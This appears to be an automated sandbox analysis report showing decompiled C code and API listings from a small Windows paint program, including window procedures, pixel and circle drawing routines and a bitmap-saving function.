                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Menu$Append$Create
                                              • String ID:
                                              • API String ID: 508680711-0
                                              • Opcode ID: d56284e506ee990aae235beb6f46758a1c52f0257b7e0cb193e9b9f86cd032c9
                                              • Instruction ID: 4e4399401736d2d8082761ab7defd37d6f88db0f9f50055c06793ba720eebf12
                                              • Opcode Fuzzy Hash: d56284e506ee990aae235beb6f46758a1c52f0257b7e0cb193e9b9f86cd032c9
                                              • Instruction Fuzzy Hash: A041F175A80304BBDB119BE1EC6EFBF7B35BB54B51F014958F319AA1E0C6B19A00CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FD620(void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				int _v8;
                                              
                                              				_v8 = _a8;
                                              				if(_v8 == 1) {
                                              					CreateWindowExW(0, L"button", L"32px", 0x50000000, 0x32, 0x1e, 0x1e, 0x19, _a4, 1, 0, 0);
                                              					CreateWindowExW(0, L"button", L"64px", 0x50000000, 0x55, 0x1e, 0x1e, 0x19, _a4, 1, 0, 0);
                                              					CreateWindowExW(0, L"button", L"128px", 0x50000000, 0x73, 0x1e, 0x1e, 0x19, _a4, 1, 0, 0);
                                              					CreateWindowExW(0, L"button", L"256px", 0x50000000, 0x96, 0x1e, 0x1e, 0x19, _a4, 1, 0, 0);
                                              				} else {
                                              					if(_v8 == 0x10) {
                                              						DestroyWindow(_a4);
                                              					} else {
                                              						if(_v8 == 0x111) {
                                              							DestroyWindow(_a4);
                                              						}
                                              					}
                                              				}
                                              				return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              			}




                                              0x002fd627
                                              0x002fd62e
                                              0x002fd66f
                                              0x002fd698
                                              0x002fd6c1
                                              0x002fd6ed
                                              0x002fd630
                                              0x002fd634
                                              0x002fd705
                                              0x002fd63a
                                              0x002fd641
                                              0x002fd6f9
                                              0x002fd6f9
                                              0x002fd641
                                              0x002fd634
                                              0x002fd724

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Window$Create$Destroy$Proc
                                              • String ID: 128px$256px$32px$64px$button$button$button$button
                                              • API String ID: 3952264185-740826005
                                              • Opcode ID: 216e3887d6d73487e7b5a9338cc8fd2210a8a55af58d492f38a60c0944ff06a4
                                              • Instruction ID: c6d594fe9e2ba9dd701f18af6f1a68252f1e5e04e61b8b6f80d1c4b09b4f4056
                                              • Opcode Fuzzy Hash: 216e3887d6d73487e7b5a9338cc8fd2210a8a55af58d492f38a60c0944ff06a4
                                              • Instruction Fuzzy Hash: 4721F9753D034CBBFB25DE50DD5AFEA7625AB08F41F104114FB096E1D1D2F1AA409754
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 93%
                                              			E002FCE30(struct HWND__* _a4, int _a8, int _a12, signed int _a16) {
                                              				struct HDC__* _v8;
                                              				int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				intOrPtr _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				struct tagPAINTSTRUCT _v96;
                                              				long _t102;
                                              				long _t125;
                                              				intOrPtr _t168;
                                              				long _t180;
                                              				long _t187;
                                              				long _t200;
                                              				long _t212;
                                              				long _t222;
                                              				long _t226;
                                              				intOrPtr _t229;
                                              				long _t240;
                                              				long _t247;
                                              				long _t253;
                                              				long _t255;
                                              				long _t257;
                                              				long _t259;
                                              
                                              				_v12 = _a8;
                                              				if(_v12 > 0x200) {
                                              					__eflags = _v12 - 0x201;
                                              					if(_v12 == 0x201) {
                                              						 *0x305990 = _a16 & 0xffff;
                                              						 *0x305988 = _a16 >> 0x00000010 & 0xffff;
                                              						 *0x305994 =  *0x305990;
                                              						 *0x30598c =  *0x305988;
                                              						 *0x305940 = 1;
                                              						_t174 = _a4;
                                              						_v8 = GetDC(_a4);
                                              						__eflags =  *0x304b3c - 2;
                                              						if( *0x304b3c == 2) {
                                              							 *0x304a00 = GetPixel(_v8,  *0x305990,  *0x305988);
                                              						} else {
                                              							_t229 =  *0x3059c0;
                                              							__eflags =  *((intOrPtr*)(_t229 + 8)) -  *0x3059c4;
                                              							if( *((intOrPtr*)(_t229 + 8)) !=  *0x3059c4) {
                                              								_t174 =  *0x3059c0;
                                              								E002FB910( *0x3059c0);
                                              							}
                                              							E002FC2C0(_t174, 0x3059c4, 0x3059c0);
                                              						}
                                              						__eflags =  *0x304b3c - 5;
                                              						if( *0x304b3c != 5) {
                                              							_t226 =  *0x304a00; // 0xffffff
                                              							E002FC390( *0x305990,  *0x3059c0,  *0x305990,  *0x305988, GetPixel(_v8,  *0x305990,  *0x305988), _t226);
                                              						}
                                              						__eflags =  *0x304b3c - 6;
                                              						if(__eflags != 0) {
                                              							__eflags =  *0x304b3c - 5;
                                              							if( *0x304b3c != 5) {
                                              								_t222 =  *0x304a00; // 0xffffff
                                              								SetPixel(_v8,  *0x305990,  *0x305988, _t222);
                                              							}
                                              						} else {
                                              							_t102 = GetPixel(_v8,  *0x305990,  *0x305988);
                                              							_t180 =  *0x304a00; // 0xffffff
                                              							E002FB540(__eflags, _v8,  *0x305990,  *0x305988, _t180, _t102, 0, 0, 0,  *0x3059c0);
                                              						}
                                              						ReleaseDC(_a4, _v8);
                                              						L55:
                                              						return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              					}
                                              					__eflags = _v12 - 0x202;
                                              					if(_v12 == 0x202) {
                                              						 *0x305940 = 0;
                                              						_v8 = GetDC(_a4);
                                              						__eflags =  *0x304b3c - 4;
                                              						if( *0x304b3c == 4) {
                                              							L39:
                                              							SelectObject(_v8, GetStockObject(5));
                                              							_v32 = _a16 & 0xffff;
                                              							_v28 = _a16 >> 0x00000010 & 0xffff;
                                              							__eflags =  *0x304b3c - 4;
                                              							if( *0x304b3c != 4) {
                                              								__eflags =  *0x304b3c - 3;
                                              								if( *0x304b3c != 3) {
                                              									__eflags =  *0x304b3c - 5;
                                              									if( *0x304b3c == 5) {
                                              										_push(1);
                                              										_t187 =  *0x304a00; // 0xffffff
                                              										E002FB9D0(_v8,  *0x305990,  *0x305988, E002FB900(_v32,  *0x305990,  *0x305988, _v32, _v28), _t187,  *0x3059c0, 1);
                                              									}
                                              								} else {
                                              									_t125 =  *0x304a00; // 0xffffff
                                              									E002FBE50(_v8, _v8,  *0x305990,  *0x305988, _v32, _v28, _t125,  *0x3059c0, 1, 1);
                                              								}
                                              							} else {
                                              								_t240 =  *0x304a00; // 0xffffff
                                              								E002FBD50(_v8,  *0x305990,  *0x305988, _v32, _v28, _t240,  *0x3059c0, 1, 1);
                                              							}
                                              							L45:
                                              							ReleaseDC(_a4, _v8);
                                              							goto L55;
                                              						}
                                              						__eflags =  *0x304b3c - 3;
                                              						if( *0x304b3c == 3) {
                                              							goto L39;
                                              						}
                                              						__eflags =  *0x304b3c - 5;
                                              						if( *0x304b3c != 5) {
                                              							goto L45;
                                              						}
                                              						goto L39;
                                              					} else {
                                              						goto L55;
                                              					}
                                              				}
                                              				if(_v12 == 0x200) {
                                              					__eflags =  *0x305940 - 1;
                                              					if( *0x305940 != 1) {
                                              						L35:
                                              						goto L55;
                                              					}
                                              					_v8 = GetDC(_a4);
                                              					_v16 = _a16 & 0xffff;
                                              					_v20 = _a16 >> 0x00000010 & 0xffff;
                                              					__eflags =  *0x304b3c - 1;
                                              					if( *0x304b3c != 1) {
                                              						L25:
                                              						__eflags =  *0x304b3c - 4;
                                              						if( *0x304b3c == 4) {
                                              							L28:
                                              							SetROP2(_v8, 6);
                                              							__eflags =  *0x304b3c - 4;
                                              							if( *0x304b3c != 4) {
                                              								__eflags =  *0x304b3c - 3;
                                              								if( *0x304b3c != 3) {
                                              									__eflags =  *0x304b3c - 5;
                                              									if( *0x304b3c == 5) {
                                              										_push(0);
                                              										_t247 =  *0x304a00; // 0xffffff
                                              										E002FB9D0(_v8,  *0x305990,  *0x305988, E002FB900( *0x305990,  *0x305990,  *0x305988,  *0x305994,  *0x30598c), _t247, 0, 0);
                                              										_push(0);
                                              										_t200 =  *0x304a00; // 0xffffff
                                              										E002FB9D0(_v8,  *0x305990,  *0x305988, E002FB900(_v16,  *0x305990,  *0x305988, _v16, _v20), _t200, 0, 0);
                                              									}
                                              								} else {
                                              									_t253 =  *0x304a00; // 0xffffff
                                              									E002FBE50( *0x305988, _v8,  *0x305990,  *0x305988,  *0x305994,  *0x30598c, _t253, 0, 0, 0);
                                              									_t255 =  *0x304a00; // 0xffffff
                                              									E002FBE50( *0x305988, _v8,  *0x305990,  *0x305988, _v16, _v20, _t255, 0, 0, 0);
                                              								}
                                              							} else {
                                              								_t257 =  *0x304a00; // 0xffffff
                                              								E002FBD50(_v8,  *0x305990,  *0x305988,  *0x305994,  *0x30598c, _t257, 0, 0, 0);
                                              								_t259 =  *0x304a00; // 0xffffff
                                              								E002FBD50(_v8,  *0x305990,  *0x305988, _v16, _v20, _t259, 0, 0, 0);
                                              							}
                                              							L34:
                                              							 *0x305994 = _v16;
                                              							 *0x30598c = _v20;
                                              							ReleaseDC(_a4, _v8);
                                              							goto L35;
                                              						}
                                              						__eflags =  *0x304b3c - 3;
                                              						if( *0x304b3c == 3) {
                                              							goto L28;
                                              						}
                                              						__eflags =  *0x304b3c - 5;
                                              						if( *0x304b3c != 5) {
                                              							goto L34;
                                              						}
                                              						goto L28;
                                              					}
                                              					__eflags = _v16 -  *0x305994;
                                              					if(_v16 !=  *0x305994) {
                                              						L24:
                                              						_t212 =  *0x304a00; // 0xffffff
                                              						E002FBE50( *0x305994, _v8,  *0x305994,  *0x30598c, _v16, _v20, _t212,  *0x3059c0, 1, 0);
                                              						goto L34;
                                              					}
                                              					__eflags = _v20 -  *0x30598c;
                                              					if(_v20 ==  *0x30598c) {
                                              						goto L25;
                                              					}
                                              					goto L24;
                                              				}
                                              				if(_v12 == 2) {
                                              					PostQuitMessage(0);
                                              					goto L55;
                                              				}
                                              				if(_v12 == 0xf) {
                                              					_v8 = BeginPaint(_a4,  &_v96);
                                              					_v24 =  *0x3059b0;
                                              					while(1) {
                                              						__eflags = 1;
                                              						if(1 == 0) {
                                              							break;
                                              						}
                                              						_v24 =  *((intOrPtr*)(_v24 + 8));
                                              						__eflags = _v24 -  *0x3059c4;
                                              						if(_v24 ==  *0x3059c4) {
                                              							L51:
                                              							break;
                                              						}
                                              						_t168 =  *0x3059c0;
                                              						__eflags = _v24 -  *((intOrPtr*)(_t168 + 8));
                                              						if(_v24 !=  *((intOrPtr*)(_t168 + 8))) {
                                              							E002FC0F0(_v24, _a4);
                                              							continue;
                                              						}
                                              						goto L51;
                                              					}
                                              					EndPaint(_a4,  &_v96);
                                              				} else {
                                              				}
                                              			}



























                                              0x002fce39
                                              0x002fce43
                                              0x002fce6b
                                              0x002fce72
                                              0x002fce92
                                              0x002fcea6
                                              0x002fceb2
                                              0x002fcebd
                                              0x002fcec2
                                              0x002fcecc
                                              0x002fced6
                                              0x002fced9
                                              0x002fcee0
                                              0x002fcf27
                                              0x002fcee2
                                              0x002fcee2
                                              0x002fceeb
                                              0x002fcef1
                                              0x002fcef3
                                              0x002fcefa
                                              0x002fcefa
                                              0x002fcf09
                                              0x002fcf09
                                              0x002fcf2c
                                              0x002fcf33
                                              0x002fcf35
                                              0x002fcf68
                                              0x002fcf68
                                              0x002fcf6d
                                              0x002fcf74
                                              0x002fcfba
                                              0x002fcfc1
                                              0x002fcfc3
                                              0x002fcfdb
                                              0x002fcfdb
                                              0x002fcf76
                                              0x002fcf94
                                              0x002fcf9b
                                              0x002fcfb3
                                              0x002fcfb3
                                              0x002fcfe9
                                              0x002fd3df
                                              0x002fd3f8
                                              0x002fd3f8
                                              0x002fce74
                                              0x002fce7b
                                              0x002fd233
                                              0x002fd247
                                              0x002fd24a
                                              0x002fd251
                                              0x002fd269
                                              0x002fd276
                                              0x002fd287
                                              0x002fd299
                                              0x002fd29c
                                              0x002fd2a3
                                              0x002fd2da
                                              0x002fd2e1
                                              0x002fd314
                                              0x002fd31b
                                              0x002fd31d
                                              0x002fd327
                                              0x002fd35b
                                              0x002fd35b
                                              0x002fd2e3
                                              0x002fd2ee
                                              0x002fd30d
                                              0x002fd30d
                                              0x002fd2a5
                                              0x002fd2b0
                                              0x002fd2d0
                                              0x002fd2d0
                                              0x002fd360
                                              0x002fd368
                                              0x00000000
                                              0x002fd368
                                              0x002fd253
                                              0x002fd25a
                                              0x00000000
                                              0x00000000
                                              0x002fd25c
                                              0x002fd263
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002fce81
                                              0x00000000
                                              0x002fce81
                                              0x002fce7b
                                              0x002fce4c
                                              0x002fcff4
                                              0x002fcffb
                                              0x002fd22e
                                              0x00000000
                                              0x002fd22e
                                              0x002fd00b
                                              0x002fd019
                                              0x002fd02b
                                              0x002fd02e
                                              0x002fd035
                                              0x002fd082
                                              0x002fd082
                                              0x002fd089
                                              0x002fd0a1
                                              0x002fd0a7
                                              0x002fd0ad
                                              0x002fd0b4
                                              0x002fd116
                                              0x002fd11d
                                              0x002fd17f
                                              0x002fd186
                                              0x002fd18c
                                              0x002fd192
                                              0x002fd1cb
                                              0x002fd1d0
                                              0x002fd1d6
                                              0x002fd20a
                                              0x002fd20a
                                              0x002fd11f
                                              0x002fd125
                                              0x002fd14a
                                              0x002fd155
                                              0x002fd175
                                              0x002fd175
                                              0x002fd0b6
                                              0x002fd0bc
                                              0x002fd0e1
                                              0x002fd0ec
                                              0x002fd10c
                                              0x002fd10c
                                              0x002fd20f
                                              0x002fd212
                                              0x002fd21a
                                              0x002fd228
                                              0x00000000
                                              0x002fd228
                                              0x002fd08b
                                              0x002fd092
                                              0x00000000
                                              0x00000000
                                              0x002fd094
                                              0x002fd09b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002fd09b
                                              0x002fd03a
                                              0x002fd040
                                              0x002fd04d
                                              0x002fd057
                                              0x002fd078
                                              0x00000000
                                              0x002fd078
                                              0x002fd045
                                              0x002fd04b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002fd04b
                                              0x002fce56
                                              0x002fd372
                                              0x00000000
                                              0x002fd372
                                              0x002fce60
                                              0x002fd388
                                              0x002fd391
                                              0x002fd394
                                              0x002fd399
                                              0x002fd39b
                                              0x00000000
                                              0x00000000
                                              0x002fd3a3
                                              0x002fd3a9
                                              0x002fd3af
                                              0x002fd3be
                                              0x00000000
                                              0x002fd3be
                                              0x002fd3b1
                                              0x002fd3b9
                                              0x002fd3bc
                                              0x002fd3ca
                                              0x00000000
                                              0x002fd3cf
                                              0x00000000
                                              0x002fd3bc
                                              0x002fd3d9
                                              0x00000000
                                              0x002fce66

                                              APIs
                                              • GetDC.USER32(00000200), ref: 002FD005
                                              • ReleaseDC.USER32 ref: 002FD228
                                              • PostQuitMessage.USER32(00000000), ref: 002FD372
                                              • BeginPaint.USER32(0000000F,?), ref: 002FD382
                                              • EndPaint.USER32(0000000F,?), ref: 002FD3D9
                                              • DefWindowProcW.USER32(00000201,?,?,?), ref: 002FD3EF
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Paint$BeginMessagePostProcQuitReleaseWindow
                                              • String ID:
                                              • API String ID: 76768696-0
                                              • Opcode ID: eed4006fac38964ef7ae2366e636e574910da7223499f764b43d4d7463a9f399
                                              • Instruction ID: f9d3ce9085b596cb68455e6053cb47681f63e8956b31e91e5b9020cdb8df749c
                                              • Opcode Fuzzy Hash: eed4006fac38964ef7ae2366e636e574910da7223499f764b43d4d7463a9f399
                                              • Instruction Fuzzy Hash: 1B02EAB5612508EFCB15CF99ECA4E7BB7BABB48750F10851AF309972A0C770A950CF64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FB9D0(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, long _a20, intOrPtr _a24, intOrPtr _a28) {
                                              				intOrPtr _v8;
                                              				signed int _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _t176;
                                              
                                              				_v16 = 1 - _a16;
                                              				_v8 = 0;
                                              				_v12 = _a16;
                                              				_v20 = 3;
                                              				_t176 = 5 - (_a16 << 1);
                                              				_v24 = 5;
                                              				while(_v12 >= _v8) {
                                              					if(_a28 != 0) {
                                              						E002FC390(_a24, _a24, _a8 + _v8, _a12 + _v12, 0xffffff - GetPixel(_a4, _a8 + _v8, _a12 + _v12), _a20);
                                              						E002FC390(_a24, _a24, _a8 + _v12, _a12 + _v8, 0xffffff - GetPixel(_a4, _a8 + _v12, _a12 + _v8), _a20);
                                              						E002FC390(_a24, _a24, _a8 + _v8, _a12 - _v12, 0xffffff - GetPixel(_a4, _a8 + _v8, _a12 - _v12), _a20);
                                              						E002FC390(_a24, _a24, _a8 - _v12, _a12 + _v8, 0xffffff - GetPixel(_a4, _a8 - _v12, _a12 + _v8), _a20);
                                              						E002FC390(_a24, _a24, _a8 + _v12, _a12 - _v8, 0xffffff - GetPixel(_a4, _a8 + _v12, _a12 - _v8), _a20);
                                              						E002FC390(_a24, _a24, _a8 - _v8, _a12 - _v12, 0xffffff - GetPixel(_a4, _a8 - _v8, _a12 - _v12), _a20);
                                              						E002FC390(_a24, _a24, _a8 - _v12, _a12 - _v8, 0xffffff - GetPixel(_a4, _a8 - _v12, _a12 - _v8), _a20);
                                              						E002FC390(_a24, _a24, _a8 - _v8, _a12 + _v12, 0xffffff - GetPixel(_a4, _a8 - _v8, _a12 + _v12), _a20);
                                              					}
                                              					SetPixel(_a4, _a8 + _v8, _a12 + _v12, _a20);
                                              					SetPixel(_a4, _a8 + _v8, _a12 - _v12, _a20);
                                              					if(_v8 != _v12) {
                                              						SetPixel(_a4, _a8 + _v12, _a12 + _v8, _a20);
                                              						SetPixel(_a4, _a8 - _v12, _a12 + _v8, _a20);
                                              					}
                                              					if(_v8 != 0) {
                                              						SetPixel(_a4, _a8 - _v8, _a12 + _v12, _a20);
                                              						SetPixel(_a4, _a8 - _v8, _a12 - _v12, _a20);
                                              					}
                                              					if(_v8 != _v12 && _v8 != 0) {
                                              						SetPixel(_a4, _a8 + _v12, _a12 - _v8, _a20);
                                              						SetPixel(_a4, _a8 - _v12, _a12 - _v8, _a20);
                                              					}
                                              					if(_v16 >= 0) {
                                              						_v16 = _v16 + _v24;
                                              						_v20 = _v20 + 2;
                                              						_v24 = _v24 + 4;
                                              						_t176 = _v12 - 1;
                                              						_v12 = _t176;
                                              					} else {
                                              						_t176 = _v16 + _v20;
                                              						_v16 = _t176;
                                              						_v20 = _v20 + 2;
                                              						_v24 = _v24 + 2;
                                              					}
                                              					_v8 = _v8 + 1;
                                              				}
                                              				return _t176;
                                              			}









                                              0x002fb9de
                                              0x002fb9e1
                                              0x002fb9eb
                                              0x002fb9ee
                                              0x002fb9ff
                                              0x002fba01
                                              0x002fba04
                                              0x002fba14
                                              0x002fba50
                                              0x002fba8b
                                              0x002fbac6
                                              0x002fbb01
                                              0x002fbb3c
                                              0x002fbb77
                                              0x002fbbb2
                                              0x002fbbed
                                              0x002fbbed
                                              0x002fbc08
                                              0x002fbc24
                                              0x002fbc30
                                              0x002fbc48
                                              0x002fbc64
                                              0x002fbc64
                                              0x002fbc6e
                                              0x002fbc86
                                              0x002fbca2
                                              0x002fbca2
                                              0x002fbcae
                                              0x002fbccc
                                              0x002fbce8
                                              0x002fbce8
                                              0x002fbcf2
                                              0x002fbd17
                                              0x002fbd20
                                              0x002fbd29
                                              0x002fbd2f
                                              0x002fbd32
                                              0x002fbcf4
                                              0x002fbcf7
                                              0x002fbcfa
                                              0x002fbd03
                                              0x002fbd0c
                                              0x002fbd0c
                                              0x002fbd3b
                                              0x002fbd3b
                                              0x002fbd46

                                              APIs
                                              • GetPixel.GDI32(?,00000000,?), ref: 002FBA30
                                              • GetPixel.GDI32(?,?,00000000), ref: 002FBA6B
                                              • GetPixel.GDI32(?,00000000,?), ref: 002FBAA6
                                              • GetPixel.GDI32(?,?,00000000), ref: 002FBAE1
                                              • GetPixel.GDI32(?,?,00000000), ref: 002FBB1C
                                              • GetPixel.GDI32(?,00000000,?), ref: 002FBB57
                                              • GetPixel.GDI32(?,?,00000000), ref: 002FBB92
                                              • GetPixel.GDI32(?,00000000,?), ref: 002FBBCD
                                              • SetPixel.GDI32(?,00000000,?,?), ref: 002FBC08
                                              • SetPixel.GDI32(?,00000000,?,?), ref: 002FBC24
                                              • SetPixel.GDI32(?,?,00000000,?), ref: 002FBC48
                                              • SetPixel.GDI32(?,?,00000000,?), ref: 002FBC64
                                              • SetPixel.GDI32(?,00000000,?,?), ref: 002FBC86
                                              • SetPixel.GDI32(?,00000000,?,?), ref: 002FBCA2
                                              • SetPixel.GDI32(?,?,00000000,?), ref: 002FBCCC
                                              • SetPixel.GDI32(?,?,00000000,?), ref: 002FBCE8
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Pixel
                                              • String ID:
                                              • API String ID: 3195210534-0
                                              • Opcode ID: 82e5d0e6bd46545fea573c4454ddfd597380d12e8f6077e61950101e6268d8d4
                                              • Instruction ID: ff76207a708b271be82467342edb7cdf6b54f46a92851b53fe10a231f359e6ae
                                              • Opcode Fuzzy Hash: 82e5d0e6bd46545fea573c4454ddfd597380d12e8f6077e61950101e6268d8d4
                                              • Instruction Fuzzy Hash: 1AD176B6510109EFCB04CFACD994DEFBBB9BF88350F108658FA1997254C630EA51DB64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 85%
                                              			E002FB350(struct HBITMAP__* _a4, WCHAR* _a8) {
                                              				struct tagBITMAPINFO* _v8;
                                              				signed int _v12;
                                              				long _v16;
                                              				struct HDC__* _v20;
                                              				void* _v24;
                                              				signed int _v28;
                                              				long _v32;
                                              				intOrPtr _v38;
                                              				short _v40;
                                              				short _v42;
                                              				intOrPtr _v46;
                                              				void _v48;
                                              				signed short _v54;
                                              				signed short _v56;
                                              				int _v64;
                                              				signed int _v68;
                                              				void _v72;
                                              				struct HWND__* _v76;
                                              				struct HWND__* _v80;
                                              				struct HWND__* _v84;
                                              				struct HWND__* _v88;
                                              				signed int _v92;
                                              				struct HWND__* _v96;
                                              				signed int _v98;
                                              				short _v100;
                                              				int _v104;
                                              				signed int _v108;
                                              				void _v112;
                                              
                                              				_v20 = GetDC(0);
                                              				GetObjectW(_a4, 0x18,  &_v72);
                                              				_v112 = 0x28;
                                              				_v108 = _v68;
                                              				_v104 = _v64;
                                              				_v100 = 1;
                                              				_v98 = (_v56 & 0x0000ffff) * (_v54 & 0x0000ffff);
                                              				if((_v98 & 0x0000ffff) > 8) {
                                              					_v98 = 0x18;
                                              				}
                                              				_v96 = 0;
                                              				_v92 = 0;
                                              				_v88 = 0;
                                              				_v84 = 0;
                                              				_v80 = 0;
                                              				_v76 = 0;
                                              				if((_v98 & 0x0000ffff) != 0x18) {
                                              					_v28 = 1 << (_v98 & 0x0000ffff);
                                              				} else {
                                              					_v28 = 0;
                                              				}
                                              				_v12 = _v28 << 2;
                                              				_push(_v112 + _v12);
                                              				_v8 = E002F2487(_v112 + _v12);
                                              				memcpy(_v8,  &_v112, 0xa << 2);
                                              				GetDIBits(_v20, _a4, 0, _v64, 0, _v8, 0);
                                              				memcpy( &_v112, _v8, 0xa << 2);
                                              				if(_v92 == 0) {
                                              					_v92 = (((_v98 & 0x0000ffff) * _v108 + 0x0000001f & 0xffffffe0) >> 3) * _v104;
                                              				}
                                              				_v16 = _v112 + _v12 + _v92;
                                              				_push(_v16);
                                              				_push(_v8);
                                              				_v8 = E002F2477(_v112 + _v12 + _v92, _v16);
                                              				GetDIBits(_v20, _a4, 0, _v64, _v8 + _v112 + _v12, _v8, 0);
                                              				_v38 = _v12 + 0x36;
                                              				_v42 = 0;
                                              				_v40 = 0;
                                              				_v46 = _v16 + 0xe;
                                              				_v48 = 0x4d42;
                                              				_v24 = CreateFileW(_a8, 0x40000000, 0, 0, 2, 0x80, 0);
                                              				WriteFile(_v24,  &_v48, 0xe,  &_v32, 0);
                                              				WriteFile(_v24, _v8, _v16,  &_v32, 0);
                                              				ReleaseDC(0, _v20);
                                              				return CloseHandle(_v24);
                                              			}































                                              0x002fb360
                                              0x002fb36d
                                              0x002fb373
                                              0x002fb37d
                                              0x002fb383
                                              0x002fb38b
                                              0x002fb39a
                                              0x002fb3a5
                                              0x002fb3ac
                                              0x002fb3ac
                                              0x002fb3b0
                                              0x002fb3b7
                                              0x002fb3be
                                              0x002fb3c5
                                              0x002fb3cc
                                              0x002fb3d3
                                              0x002fb3e1
                                              0x002fb3f7
                                              0x002fb3e3
                                              0x002fb3e3
                                              0x002fb3e3
                                              0x002fb400
                                              0x002fb409
                                              0x002fb412
                                              0x002fb420
                                              0x002fb438
                                              0x002fb449
                                              0x002fb44f
                                              0x002fb466
                                              0x002fb466
                                              0x002fb472
                                              0x002fb478
                                              0x002fb47c
                                              0x002fb485
                                              0x002fb4a6
                                              0x002fb4b2
                                              0x002fb4b7
                                              0x002fb4bd
                                              0x002fb4c7
                                              0x002fb4cf
                                              0x002fb4ef
                                              0x002fb502
                                              0x002fb51a
                                              0x002fb526
                                              0x002fb53b

                                              APIs
                                              • GetDC.USER32(00000000), ref: 002FB35A
                                              • GetObjectW.GDI32(?,00000018,?), ref: 002FB36D
                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,?,00000000), ref: 002FB438
                                              • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 002FB4A6
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 002FB4E9
                                              • WriteFile.KERNEL32(?,?,0000000E,?,00000000), ref: 002FB502
                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 002FB51A
                                              • ReleaseDC.USER32 ref: 002FB526
                                              • CloseHandle.KERNEL32(?), ref: 002FB530
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: File$BitsWrite$CloseCreateHandleObjectRelease
                                              • String ID: (
                                              • API String ID: 1864849596-3887548279
                                              • Opcode ID: dfcf794a157387090c46c0472e9066e23338345ce97ba9ab190e104e255db132
                                              • Instruction ID: 99a353824dc3299d9dd34eefd8ceeed3b4ee44d0fb702dd5b19753f217b23ecc
                                              • Opcode Fuzzy Hash: dfcf794a157387090c46c0472e9066e23338345ce97ba9ab190e104e255db132
                                              • Instruction Fuzzy Hash: B46104B5E00208EBDB04CFD4D995BEEBBB5EF88700F108119E615BB294D775AA04CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 87%
                                              			E002FCC60(struct HINSTANCE__* _a4) {
                                              				long _v8;
                                              				struct tagMSG _v36;
                                              				struct _WNDCLASSW _v76;
                                              
                                              				_v76.style = 0;
                                              				_v76.lpfnWndProc = 0;
                                              				_v76.cbClsExtra = 0;
                                              				_v76.cbWndExtra = 0;
                                              				_v76.hInstance = 0;
                                              				_v76.hIcon = 0;
                                              				_v76.hCursor = 0;
                                              				_v76.hbrBackground = 0;
                                              				_v76.lpszMenuName = 0;
                                              				_v76.lpszClassName = 0;
                                              				_v76.lpszClassName = 0x304a04;
                                              				_v76.hInstance = _a4;
                                              				_v76.hbrBackground = GetSysColorBrush(0xf);
                                              				_v76.lpfnWndProc = E002FCAB0;
                                              				_v76.hCursor = LoadCursorW(0, 0x7f00);
                                              				RegisterClassW( &_v76);
